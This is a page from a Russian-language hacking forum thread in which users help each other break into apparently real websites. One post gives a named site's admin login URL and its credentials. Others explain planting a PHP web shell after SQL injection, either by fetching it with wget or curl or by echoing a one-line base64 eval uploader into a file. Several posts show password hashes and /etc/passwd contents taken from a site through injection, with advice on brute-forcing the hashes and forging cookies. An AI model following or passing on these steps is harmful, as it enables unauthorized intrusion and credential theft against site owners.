Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 67 of 1207
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Звёздочки это аккаунт,вот админка
    _http://www.zdorovie-plus.com/adm/login.php

    З.Ы.Т.е. логин 5 звёздочек и пароль 5 звездочек :D

    А шелл врятли, прав не хватит, если через скуль,а в админке я не лазил можешь посмотреть
     
    #1321 Kakoytoxaker, 22 Mar 2008
    Last edited: 22 Mar 2008
    2 people like this.
  2. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    по поводу аккаунта спасибо-сам бы не догадался, что звездочки-это вовсе не звездочки
    а по поводу админки я уже нашел на http://madnet.name/tools/madss/
    -------------------------------
    а как насчет шелла?
    -------------------------------
    хотелось бы сделать копию сайта-для экспериментов на локалхосте(или взять где-то любую другую копию более менее "серьезного"сайта)
    --------------------------------
    в админке был-мне это ничего не дало
    Я ж говорю: шеллы никогда еще не заливал, прошу помощи, потому что на примере учиться легче и понятней, чем на голой теории
     
    #1322 samarin, 22 Mar 2008
    Last edited: 22 Mar 2008
  3. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Подскажите пожалуйста, как можно залить php шелл, на подобии r57shell, через залитый через инжекцию файл с содержанием -
    :confused:
     
    #1323 Spaise, 23 Mar 2008
    Last edited: 23 Mar 2008
  4. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    wget http://shell
    curl
    fetch
    lynx
    links
    axel :d

    смотря что есть на серваке
     
    #1324 darky, 23 Mar 2008
  5. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    Про команды в ОС почитать видимо религия не позволяет?:)
    Если *nix то так:
    wget -o [что] [куда]
    Если вин, то проще наверное с фтп скачать, хотя могу ошибаться.
     
    #1325 Dima-k17, 23 Mar 2008
  6. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    если нет никаких качалок легче echo-нуть аплоуд скрипт в 1 строку ( echo '<?php+eval(base64_decode(тут_пхп_код_в_бэйсе));?>' >1.php ) в файл, и через нее уже залить
     
    #1326 darky, 23 Mar 2008
  7. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Скажите пожалуйста, здесь есть уязвимость?
    MSSQL
     
    #1327 Spaise, 23 Mar 2008
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    есть, только это не MSSQL, а MS Access причем помогут скорее всего в этой скуле только подзапросы
     
    #1328 Scipio, 23 Mar 2008
  9. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ребят, подскажите как сделать дамп базы данных mysql или доступ по ftp получить ? Имеются логин и пароль вида - u15364/6cb1963d2018c3ea полученные через скуль.

    Как расшифровать пароль? Или как сделать дамп? Есть еще данные файла /etc/passwd...
     
    #1329 mff, 23 Mar 2008
  10. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    (с)

    2 mff
    6cb1963d2018c3ea - mysql хэш. Перебирать через PasswordsPro
     
    _________________________
    #1330 +toxa+, 23 Mar 2008
    1 person likes this.
  11. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Спасибо!

    Спасибо! Эту програмку я давно знаю!
     
    #1331 mff, 23 Mar 2008
  12. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Если кто то может помочь быстрее помогите плис ! Вот что выдала скуль - u15364/6cb1963d2018c3ea и admin/54e0c6945fa5e34c

    Заранее всем спасибо!
     
    #1332 mff, 23 Mar 2008
  13. Spaise

    Spaise Elder - Старейшина

    Joined:
    21 Mar 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    Ищи админку или можешь попробывать зарегистрироваться на сайте и подставить в cookie свои данные, если cookie используются. Admin и u15364 - логины наверное, а то что после них - хеши. Про хеши читай здесь -> http://old.antichat.ru/txt/hashes/
    Что тебе еще надо? :)
     
    #1333 Spaise, 23 Mar 2008
  14. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Спасиб, почитаю, сейчас перебираю при помощи PaswordsPro, но боюсь что это на долго...

    а ССЫЛОЧКА отстой. Нету там ничего по mysql. И всё равно спасибо!
     
    #1334 mff, 23 Mar 2008
    Last edited: 23 Mar 2008
  15. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    почему сразу <? include($s) ?>

    а если register_globals off? а если url access disabled?)
     
    #1335 ReVOLVeR, 23 Mar 2008
    Last edited by a moderator: 23 Mar 2008
    1 person likes this.
  16. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    mff,
    _http://injection.rulezz.ru/ по ижекту почитай..
     
    #1336 ReVOLVeR, 23 Mar 2008
  17. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ага, спасибо, читаю там SQL инъекция в сервере MySQL, по этому руководству вобщемто и делаю, но вот не всё там понятно как то...
     
    #1337 mff, 23 Mar 2008
  18. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    дак ты спрашивай что непонятно для этого и топик собственно..
     
    #1338 ReVOLVeR, 23 Mar 2008
  19. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    непонятно ReVOLVeR что делать вот с этим: 6cb1963d2018c3ea
    Как подобрать парольчик, это всё что мне нужно...
    Тебе спасибо!
     
    #1339 mff, 23 Mar 2008
    1 person likes this.
  20. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 mff
    Это mysql хэш, юзай прогу для брутфорса хэшей passwords pro, если не знаешь что такое хэш, иди сюда - http://forum.antichat.ru/forum76.html
     
    #1340 0nep@t0p, 23 Mar 2008
    2 people like this.
(You must log in or sign up to post here.)
Page 67 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.